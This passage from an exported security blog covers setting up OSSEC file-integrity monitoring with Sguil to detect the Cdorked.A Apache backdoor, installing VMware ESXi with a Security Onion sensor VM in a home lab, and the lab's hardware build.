Paste it here (or '\q' to quit): ---snip---
Agent information:
ID:001
Name:webserver
IP Address:192.168.1.5
Confirm adding it?(y/n): <b>y</b></pre>
<br />
If I was running a system with cPanel that was vulnerable to Cdorked.A then I would want to make sure OSSEC is monitoring the directories with the Apache httpd files. The OSSEC default configuration from my recent install is /var/ossec/etc/ossec.conf and the relevant lines are below:
<br />
<pre><syscheck>
<!-- Frequency that syscheck is executed - default to every 22 hours -->
<frequency>79200</frequency>
<!-- Directories to check (perform all possible verifications) -->
<directories check_all="yes">/etc,/usr/bin,/usr/sbin</directories>
<directories check_all="yes">/bin,/sbin</directories></pre>
<br />
So by default OSSEC would apparently not be checking the integrity of cPanel's Apache installation and I would need to add /usr/local/apache to the directory checks. After making any changes for my particular system, I check the status of OSSEC and it is not yet running.
<br />
<pre>$ sudo /etc/rc.d/rc.ossec status
ossec-logcollector not running...
ossec-syscheckd not running...
ossec-agentd not running...
ossec-execd not running...
$ sudo /etc/rc.d/rc.ossec start
Starting OSSEC HIDS v2.7 (by Trend Micro Inc.)...
Started ossec-execd...
Started ossec-agentd...
Started ossec-logcollector...
Started ossec-syscheckd...
Completed.</pre>
<br />
Note after adding the OSSEC agent on the remote system then adding it on the OSSEC server, you must restart ossec-hids-server in order for the ossec-remoted process to start listening on 1514/udp for remote agents.
<br />
<pre>$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
<b>ossec-remoted not running...</b>
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
$ sudo /etc/init.d/ossec-hids-server restart
Killing ossec-monitord ..
Killing ossec-logcollector ..
ossec-remoted not running ..
Killing ossec-syscheckd ..
Killing ossec-analysisd ..
ossec-maild not running ..
Killing ossec-execd ..
OSSEC HIDS v2.6 Stopped
Starting OSSEC HIDS v2.6 (by Trend Micro Inc.)...
<b>OSSEC analysisd: Testing rules failed. Configuration error. Exiting.</b>
2013/04/30 23:13:59 ossec-maild: INFO: E-Mail notification disabled. Clean Exit.
Started ossec-maild...
Started ossec-execd...
Started ossec-analysisd...
Started ossec-logcollector...
Started ossec-remoted...
Started ossec-syscheckd...
Started ossec-monitord...
Completed.
$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
<b>ossec-remoted is running...</b>
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
$ netstat -l | grep 1514
udp 0 0 *:1514 *:* </pre>
<br />
Note the error corresponding to the FAQ entry <a href="http://www.ossec.net/doc/faq/ossec.html#i-m-getting-an-error-when-starting-ossec-ossec-analysisd-testing-rules-failed-configuration-error-exiting-why">about getting an error when starting OSSEC</a>. However, since I'm running OSSEC 2.7 this did not seem to apply. Poking around, I realized the ossec-logtest executable had not been copied to /var/ossec/bin when I ran the install script. After I manually copied it to the directory, restarting OSSEC no longer caused the "Testing rules failed" error.<br />
<br />
Once you have installed OSSEC on the system to be monitored, added the agent on the server, imported the key on the system to be monitored, restarted the server process, and started the client process, you will start getting alerts from the newly added system in Sguil. For example, the content of Sguil alerts will look like this after updating gcc:
<br />
<pre>Integrity checksum changed for: '/usr/bin/gcc'
Old md5sum was: '764a405824275d806ab5c441516b2d79'
New md5sum is : '6ab74628cd8a0cdf84bb3329333d936e'
Old sha1sum was: '230a4c09010f9527f2b3d6e25968d5c7c735eb4e'
New sha1sum is : 'b931ceb76570a9ac26f86c12168b109becee038b'</pre>
<br />
In the Sguil console, if I wanted to view all the recent OSSEC alerts I could perform a query as pictured below. Note you need to escape the brackets or remove them in favor of the MySQL wildcards '%%'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3sWyzg0lJUdj2nnlg1o0xaAdAHybcPKnbzhdX15xd74VfBaRPFl03nHGoO6iNqW1icV30BClFZZHwpfNtJSHlPfWq_H0f1cXkKXmW8bySqvHUeLnUGJ8iAMwNgdWfao_tYloLypO5qEhc/s1600/ossec-query.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3sWyzg0lJUdj2nnlg1o0xaAdAHybcPKnbzhdX15xd74VfBaRPFl03nHGoO6iNqW1icV30BClFZZHwpfNtJSHlPfWq_H0f1cXkKXmW8bySqvHUeLnUGJ8iAMwNgdWfao_tYloLypO5qEhc/s400/ossec-query.png" width="400" /></a></div>
<br />
Finally, to show an example of the various types of alerting that OSSEC can do in addition to checksum changes, here is a query and output directly from the MySQL console.
<br />
<pre>mysql> SELECT count(signature),signature FROM event WHERE signature LIKE '%%OSSEC%%' GROUP BY signature ORDER BY count(signature) DESC;
+------------------+---------------------------------------------------------------------------------------+
| count(signature) | signature |
+------------------+---------------------------------------------------------------------------------------+
| 388 | [OSSEC] Integrity checksum changed. |
| 149 | [OSSEC] Host-based anomaly detection event (rootcheck). |
| 46 | [OSSEC] Integrity checksum changed again (2nd time). |
| 39 | [OSSEC] IP Address black-listed by anti-spam (blocked). |
| 12 | [OSSEC] Integrity checksum changed again (3rd time). |
| 4 | [OSSEC] Web server 400 error code. |
| 3 | [OSSEC] Receipent address must contain FQDN (504: Command parameter not implemented). |
+------------------+---------------------------------------------------------------------------------------+
7 rows in set (0.00 sec)</pre>
The highest count alert, plus the alerts indicating "2nd time" and "3rd time", are the basic functionality needed to detect changes to a file, my original use case. The "rootcheck" is alerting on files owned by root but writable by everyone. The balance of the alerts are from reading the system logs and detecting the system rejecting emails (anti-spam, 504) or web server error codes.<br />
<br />
Back to the original problem of Cdorked.A, the blog posts on the subject also indicate that NSM could detect unusually long HTTP sessions, and there are no doubt other network behaviors that could be used to create signatures or network analytics resulting in detection. File integrity checks are just one possible way to detect a compromised server. Remember you need to have known good checksums for this to work! You ideally install something like OSSEC prior to the system being live on the network or at the least prior to it running any listening services that could be compromised before computing the checksums.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com0tag:blogger.com,1999:blog-297187840164530151.post-10218983933582631492013-04-22T10:30:00.000-04:002013-04-22T10:30:02.145-04:00Home Lab Part 2: VMware ESXi, Security Onion, and MoreAs I stated in my <a href="http://eatingsecurity.blogspot.com/2013/04/new-home-lab-configuration.html" target="_blank">previous post</a> about a new home lab configuration, I decided to try VMware ESXi 5.1 on my new Shuttle SH67H. ESXi is free for uses like this, presumably because it clearly benefits VMware if professionals can use it in a lab setting and that encourages use of their paid products in production. I have seen some conflicting accounts, but it appears that the main limit on the free version of ESXi 5.1 is 32GB of RAM.<br />
<br />
I won't go into too much detail about the installation since it is adequately covered by a couple of other posts I found prior to purchasing my system.<br />
<ul>
<li><a href="http://www.ryanbirk.com/the-perfect-vmware-vsphere-5-homelab" target="_blank">The Perfect VMware vSphere 5 Home Lab</a></li>
<li><a href="http://rsts11.wordpress.com/2012/03/13/rsts11-building-my-compact-vmware-server-at-home/" target="_blank">Building my compact VMware server at home</a></li>
</ul>
I will mainly cover details that stood out and things I discovered as someone new to ESXi.<br />
<br />
I had already planned to get a Shuttle for the small form factor, low noise, and low power usage. Finding out that the SH67H could be used as a <a href="http://en.wikipedia.org/wiki/White_box_(computer_hardware)" target="_blank">white box</a> for ESXi made it easy to pick an initial project once I built the system. (Okay, we could quibble over whether a Shuttle counts as a white box). Additionally, since my previous home network sensor running Sguil had died, I figured that the first VM to build would be Security Onion but that I'd still be able to run multiple other VMs without impacting my home lab NSM.<br />
<br />
Getting ESXi installed on the Shuttle was pretty simple. After booting to CD, I just followed the prompts and made sane choices. The one thing to note is that I installed ESXi to an external USB flash drive. Since the OS is so small, it gets loaded primarily to RAM at boot anyway. Using a flash drive has some advantages and some disadvantages, as shown in many discussions on the VMware and other discussion boards. For my home lab I decided to install to the flash drive, but chances are that it will actually make no difference to me. Some ESXi servers have no local storage, so I imagine it is particularly common for those systems to use a USB flash drive.<br />
<br />
After using directly connected keyboard and monitor, I moved the system into my home "server closet" and booted it headless. I installed the vSphere Client on my local Windows VM since I don't have a non-VM Windows installation. The vSphere Client was surprisingly easy and I might even go as far as user-friendly. You can see in the screenshot below that it is relatively straightforward.<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8kMtJfa5x0Tlp5Dnbq0HWRsMYMsGBGZgzmZzbvogLu1kwGUcVtWz1URHCb_Ru8D2di42l9-pRZLQy0NF-KUzWjWg7HLvFdQ1PjP9HK64VMUc30H4_Tpm8nDtmL5qeyRqJHR451pt_IOnq/s1600/esxi.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8kMtJfa5x0Tlp5Dnbq0HWRsMYMsGBGZgzmZzbvogLu1kwGUcVtWz1URHCb_Ru8D2di42l9-pRZLQy0NF-KUzWjWg7HLvFdQ1PjP9HK64VMUc30H4_Tpm8nDtmL5qeyRqJHR451pt_IOnq/s640/esxi.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The error states "System logs on host vmshuttle are stored on non-persistent storage."</td></tr>
</tbody></table>
The first thing I noticed was, because of installing ESXi to the flash drive, I got the error shown in my screenshot.<br />
<br />
This error was only temporary. I am not sure when it was resolved, most likely after a reboot or I created the initial guest VM, but the system created a ".locker" directory in which I can clearly see all the logs. I am assuming they are persistent since vmstore0 is the internal 1TB hard drive, not the USB flash drive.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># cd /vmfs/volumes/vmstore0/<br />
# ls -l .locker/<br />
drwxr-xr-x 1 root root 280 Apr 7 16:01 core<br />
drwxr-xr-x 1 root root 280 Apr 7 16:01 downloads<br />
drwxr-xr-x 1 root root 4340 Apr 16 02:15 log<br />
drwxr-xr-x 1 root root 420 Apr 7 16:01 var</span>
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
I believe another option for fixing the error would be to manually set the scratch partition as detailed in <a href="http://kb.vmware.com/kb/1033696" target="_blank">VMware's Knowledge Base</a>. Note that I haven't actually tried that to date.<br />
<br />
Before being able to SSH into the ESXi host and look at the above directories and files, I had to enable SSH. The configuration for SSH and a number of other security-related services is available in vSphere by highlighting the host (since in the workplace you may use vSphere to manage multiple ESXi systems), then going to the Configuration tab, Security Profile, and finally SSH Properties. If you haven't noticed already, ESXi defaults to using root for everything. I haven't yet investigated the feasibility of locking down the ESXi host, but I think it's safe to say most people will rely on keeping the host as isolated as possible since the host OS is not particularly flexible or configurable outside options VMware provides.<br />
<br />
I decided the best way to use vSphere would be to copy my Windows 7 VM from my laptop to the ESXi host. Trying to scp the VM then adding it to the inventory never worked properly. I had similar problems when trying to scp a CentOS VM from my laptop. When I tried browsing the datastore in vSphere and adding a local machine to the remote inventory, it would get partway through and then fail with an I/O error. I believe this was all actually a case of a flaky wireless access point, but even in cases where I successfully copied the CentOS VM I got errors when trying to add it to the inventory.<br />
<br />
I eventually got it to work by converting the VM locally using <a href="http://www.vmware.com/support/developer/ovf/" target="_blank">ovftool</a> then deploying it to ESXi. OVF is the Open Virtualization Format, an open standard for packaging virtual machines. The syntax to convert an existing VM is simple. First, make sure the VM is powered down rather than just paused. On OSX running VMware Fusion, you can export a VM easily.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ nr$ cd /Applications/VMware\ Fusion.app/Contents/Library/VMware\ OVF\ Tool/ovftool</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ nr$ ./ovftool -dm=thin ~/Documents/Virtual\ Machines.localized/Windows\ 7\ x64.vmwarevm/Windows\ 7\ x64.vmx ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf</span><br />
<br />
After the conversion, the VM still needed to be exported to the ESXi host. I plugged my laptop into a wired connection to speed the process and eliminate any issues I was having over wireless, then sent the VM to ESXi. The options I used are to set the datastore, disk mode, and network.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ nr$ ./ovftool -ds=vmstore0 -dm=thin --network="VM Network 2" ~/Documents/VM-OVF/Windows\ 7\ x64/Windows\ 7\ x64.ovf vi://192.168.1.10/</span><br />
<br />
Once the VM is copied to the host, you will need to browse the datastore and add the VM to the ESXi inventory. Other ways to move a VM to ESXi are not endorsed by VMware. They <a href="http://kb.vmware.com/kb/2034095" target="_blank">officially recommend</a> using OVF to import VMs.<br />
<br />
All things considered, getting ESXi installed and configured was relatively easy. There are certainly drawbacks to using unsupported hardware. For example, vSphere does not display CPU temperature and other health or status information. I believe ESXi expects to use <a href="http://en.wikipedia.org/wiki/Ipmi" target="_blank">IPMI</a> for hardware status like voltages, temperatures, and more. There are options to consider for anyone wanting a home lab using supported hardware. VMware maintains a lengthy <a href="http://www.vmware.com/resources/compatibility/search.php" target="_blank">HCL</a> and I presume systems on their list support all the health status information in vSphere. I did find several possibilities to buy used servers like a Dell PowerEdge 2950 at reputable sites for about $650. Since I didn't want the noise, don't have a rack, and may not keep the system as a dedicated ESXi host, I did not go that route for a lab system.<br />
<br />
<h3>
Building a Security Onion VM</h3>
<br />
As stated, the first VM I built was Security Onion. I did this through the vSphere client and include some screenshots here. Most of this applies to building any VM using vSphere.<br />
<br />
After choosing the option to create a new VM, I selected a custom configuration. I named the VM simply "Security Onion" and chose my only datastore, vmstore0, as the storage location. I am not concerned with backwards compatibility, so chose "Virtual Machine Version 8." I chose only one core and one socket for the CPU, but allocated 4GB of RAM since I knew the combination of Suricata, Bro, and other monitoring processes would eat a lot of RAM. I was installing 64-bit, so I chose 64-bit Ubuntu as the Linux version.
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiESowXe_nWFkDnuGqDooD0uSnPz1-3vuypBij1FWkNpW-qibXqABBT5ghMyEUIf_kL_sCHTYn_ZRTaVrbx8IR2_YfJPYje2Gq1B4oLa6lqmJ-JoyksHdUbB69mhKoPmx_VWQlBvrIaXhWu/s1600/Screen+Shot+2013-04-03+at+20.41.40+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiESowXe_nWFkDnuGqDooD0uSnPz1-3vuypBij1FWkNpW-qibXqABBT5ghMyEUIf_kL_sCHTYn_ZRTaVrbx8IR2_YfJPYje2Gq1B4oLa6lqmJ-JoyksHdUbB69mhKoPmx_VWQlBvrIaXhWu/s400/Screen+Shot+2013-04-03+at+20.41.40+PM.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Choosing the number of NICs, network, and<br />
adapter to use when initially configuring the VM</td></tr>
</tbody></table>
I selected two NICs both using <a href="http://kb.vmware.com/kb/1001805" target="_blank">VMXNET 3</a>, which was probably the first non-standard selection in my custom configuration. I wanted to make sure I had separate management and promiscuous mode NICs since this will be a sensor. The option for VMXNET 3 should not be available as a choice if you previously selected an OS that doesn't support it when you created the VM.<br />
<br />
I next chose the LSI Logic SAS for the SCSI Controller. Although I think it won't matter for Ubuntu, note the following from VMware's local help files.
<br />
<blockquote class="tr_bq">
"The LSI Logic Parallel adapter and the LSI Logic SAS adapter offer equivalent performance. Some guest operating system vendors are phasing our support for parallel SCSI in favor of SAS, so if your virtual machine and guest operating system support SAS, choose LSI SAS to maintain future compatibility."</blockquote>
This is a good time to point out that hitting the "Help" button in vSphere will open the local help files in your browser, and they contain actual useful information about the differences in choices when configuring the VM. In the case of the help button during the process of creating a new VM, it will actually open the specific page that is contextually useful for the options on the current step of the process. In general, both their help files and the Knowledge Base seem quite useful.<br />
<br />
Finally, I created the virtual disk. This includes deciding whether to thin provision, thick provision lazy zeroed, or thick provision eager zeroed, meaning prepare the disk ahead of time. The documentation states that eager zeroed supports clustering for fault tolerance. I chose thick provisioned for my Security Onion since I knew with certainty that the virtual disk would get filled with NSM data like packet captures and logs. There are a number of KB and blog posts on the VMware site that detail advantages and disadvantages of the different provisioning methods.
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm2IqCHIjghmI7IVwNJpVx5fJHQKAgCzjzkMzziWK5vCL77fdgtkfuBOn3UjtR-tzgRpWCyj8Ioa_vYg5k-1XNISUM5thsRk7r-IhltpJHt7WTgPqDKM8s_6qSiynrwbYNZ2UBp1YqF0FX/s1600/Screen+Shot+2013-04-03+at+20.47.17+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="381" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm2IqCHIjghmI7IVwNJpVx5fJHQKAgCzjzkMzziWK5vCL77fdgtkfuBOn3UjtR-tzgRpWCyj8Ioa_vYg5k-1XNISUM5thsRk7r-IhltpJHt7WTgPqDKM8s_6qSiynrwbYNZ2UBp1YqF0FX/s400/Screen+Shot+2013-04-03+at+20.47.17+PM.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">The final settings for my Security Onion VM</td></tr>
</tbody></table>
<br />
Once the VM was configured on ESXi, I still needed to actually install Security Onion. You can do it the old-fashioned way by burning a disc and using the CD/DVD drive, but I used mounted the ISO. To do this, you just need to start the VM, which doesn't yet have an OS, then open a console in vSphere and click the button to mount the ISO in the virtual CD drive so it will boot to the disc image and start the installation process. The vSphere console is a similar view and interface to Fusion or Workstation and mounting the ISO works essentially the same way.<br />
<br />
The time it took from hitting the button to create a VM to the time I had a running Security Onion sensor was quite short. I had a couple small problems after the initial installation. First, in ESXi you have to manually go to the NIC settings and check a box that allows it to sniff all the traffic. My sniffing interface was initially not seeing the traffic when I checked with tcpdump, which made me realize it was probably not yet in promiscuous mode.<br />
<br />
Second, the 4GB RAM and one CPU I had initially allocated was insufficient. When the sensor was running and I tried to update Ubuntu, the system became very unresponsive. I eventually doubled the RAM to 8GB and the number of cores to two, which resolved the issue. I think at this point that I could probably actually drop back down to 4GB of RAM, but since the system has 32GB I don't need to worry about it yet.
<br />
<br />
<h3>
Other ESXi Notes</h3>
<br />
Although ESXi is stripped pretty bare of common Linux utilities and commands, there is plenty you can do from a command line through SSH instead of using vSphere. For example, to list all VMs on the system, <a href="http://kb.vmware.com/kb/1038043" target="_blank">power on</a> my Windows 7 VM, and find the IP address so I can connect through RDP:<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"># vim-cmd vmsvc/getallvms</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Vmid Name File Guest OS Version Annotation</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">1 Security Onion [vmstore0] Security Onion/Security Onion.vmx ubuntu64Guest vmx-08 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">13 Windows 7 x64 [vmstore0] Windows 7 x64/Windows 7 x64.vmx windows7_64Guest vmx-09 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">6 CentOS 64-bit [vmstore0] CentOS 64-bit/CentOS 64-bit.vmx centos64Guest vmx-08 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ # vim-cmd vmsvc/power.on 13</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ # vim-cmd vmsvc/get.guest 13 | grep -m 1 ipAddress</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ipAddress = "192.168.1.160",</span><br />
<br />
I can get smartd information from my hard drive if needed.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ # esxcli storage core device list</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Display Name: Local ATA Disk (t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Has Settable Display Name: true</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Size: 953869</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Device Type: Direct-Access </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Multipath Plugin: NMP</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Devfs Path: /vmfs/devices/disks/t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Vendor: ATA </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Model: ST1000DM003-1CH1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Revision: CC44</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> SCSI Level: 5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Pseudo: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Status: on</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is RDM Capable: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Local: true</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Removable: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is SSD: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Offline: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Perennially Reserved: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Queue Full Sample Size: 0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Queue Full Threshold: 0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Thin Provisioning Status: unknown</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Attached Filters: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> VAAI Status: unknown</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Other UIDs: vml.01000000002020202020202020202020205a31443347484b46535431303030</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Local SAS Device: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Is Boot USB Device: false</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">~ # esxcli storage core device smart get -d t10.ATA_____ST1000DM0032D1CH162__________________________________Z1D3GHKF</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Parameter Value Threshold Worst</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">---------------------------- ----- --------- -----</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Health Status OK N/A N/A </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Media Wearout Indicator N/A N/A N/A </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Write Error Count N/A N/A N/A </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Read Error Count 115 6 99 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Power-on Hours 100 0 100 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Power Cycle Count 100 20 100 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Reallocated Sector Count 100 10 100 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Raw Read Error Rate 115 6 99 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Drive Temperature 32 0 40 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Driver Rated Max Temperature 68 45 65 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Write Sectors TOT Count 200 0 200 </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Read Sectors TOT Count N/A N/A N/A </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Initial Bad Block Count 100 99 100 </span><br />
<br />
There is a lot more you can do from the ESXi command line interface, but I should emphasize again that it is stripped fairly bare and does not have a lot of commands you expect if you come from a Linux or Unix background. Even some of the utilities that are available do not have some of the options or functionality you would expect. The CLI commands will generally list options or help when run without arguments. You can also get plenty of <a href="http://www.vmware.com/support/developer/vcli/">CLI documentation</a> from VMware.<br />
<h3>
<br />
Next Steps</h3>
<br />
I now have a number of VMs installed, including a CentOS snapshot, FreeBSD, and my Windows 7 VM. My next steps will include setting up some VLANs to have some fun with a vulnerable network and an attacker network that will include <a href="http://www.kali.org/">KaliLinux</a>. I am intimately familiar with Sguil and some of the other tools in Security Onion, but also hope to dig into Suricata and Bro more than I have in the past.<br />
<br />
I also hope that my lab will provide some interesting material for future blog posts.Nathaniel Richmondhttp://www.blogger.com/profile/16307898781407130985noreply@blogger.com3tag:blogger.com,1999:blog-297187840164530151.post-52539774851704975032013-04-04T15:24:00.000-04:002013-04-04T15:24:08.050-04:00New Home Lab ConfigurationI received all my new equipment for my home lab a couple of days ago. After setting up the hardware in less than a day, I'm quite happy with it so far.<br />
<br />
I was lucky enough to have two 12-year-olds assist me when I assembled the computer. This was their first time assembling a computer from parts and they really enjoyed it.<br />
<br />
The first component was the Shuttle <a href="http://global.shuttle.com/products/productsSpecUS?productId=1477" target="_blank">SH67H3</a>. My friend Richard <a href="https://twitter.com/taosecurity/status/309097910392483841" target="_blank">recommended</a> the <a href="http://us.shuttle.com/barebone/Models/DS61.html" target="_blank">DS61</a>, but I had two main problems with that barebones system. First, it only has two RAM slots for a maximum of 16GB. That's not bad, but I decided I wanted to get a desktop that supported more RAM without going to server components while keeping the form factor small. I actually may have a second system on my purchase list for sometime this year, and in that case I would definitely consider the DS61.<br />
<br />
Second, I had read that the SH67H3 <a href="http://www.ryanbirk.com/the-perfect-vmware-vsphere-5-homelab" target="_blank">worked</a> as <a href="http://rsts11.wordpress.com/2012/03/13/rsts11-building-my-compact-vmware-server-at-home/" target="_blank">an ESXi whitebox</a>. Overall, I am a fan of Shuttle barebones. The SH67H3 is essentially the same chassis my coworkers and I used on our lab network at a previous job, just with a new motherboard and other improvements. I used very similar or identical parts for my Shuttle as the ones listed in the ESXi whitebox link above.<br />
<div>
<ul>
<li><a href="http://global.shuttle.com/products/productsSpecUS?productId=1477" target="_blank">Shuttle SH67H3</a> barebones</li>
<li><a href="http://ark.intel.com/products/52213" target="_blank">Intel Core i7 2600</a> @3.4GHz</li>
<li><a href="http://www.gskill.com/products.php?index=422" target="_blank">G.Skill F3-12800CL10S-8GBXL</a> x4 -- this memory is on the Shuttle compatibility list</li>
<li><a href="http://www.seagate.com/internal-hard-drives/desktop-hard-drives/desktop-hdd/" target="_blank">Seagate Barracuda 1TB SATA3 64MB Cache</a> 3.5" hard drive</li>
<li><a href="http://us.liteonit.com/us/product/dvd/category/dvdinternal" target="_blank">Lite-On iHAS524</a> SATA DVD/CD writer</li>
</ul>
</div>
<div>
When we popped the case open, it all looked pretty familiar and I explained the various pieces to the 12-year-olds. We removed the fan and heat sink array, which is a pretty nice low-noise setup. The case fan actually slides over the second heat sink so air blows over it on the way out the back of the chassis.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://image.shuttle.com/ResourceCenter/Upload/1477/1477_WebImage_WebImage_201103161412_6" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://image.shuttle.com/ResourceCenter/Upload/1477/1477_WebImage_WebImage_201103161412_6" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Don't forget to remove both the sticker from the heatsink and the plastic film that is on the CPU load plate before putting the CPU in the socket. After we inserted the Intel Core i7 2600, we applied thermal paste, reattached the passive cooling, and finally reattached the fan including plugging it back into the motherboard. We also inserted the four 8GB RAM sticks.</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhRkpQwJkjE8FdgxejhnvzVn291VYEK48L9rwqz4lENLPyVaJ3Tkqk7TpFGpafj_Jv8N-IadlvkMfhoed5N2wB82M_0jn6dfBNqyKZHCWsAvlLKconR9_Yr0NFlbQ8QPvUZ53WUKlJaHsY/s1600/IMG_0193+copy.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhRkpQwJkjE8FdgxejhnvzVn291VYEK48L9rwqz4lENLPyVaJ3Tkqk7TpFGpafj_Jv8N-IadlvkMfhoed5N2wB82M_0jn6dfBNqyKZHCWsAvlLKconR9_Yr0NFlbQ8QPvUZ53WUKlJaHsY/s320/IMG_0193+copy.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Shuttle SH76H3 motherboard with CPU and RAM installed</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
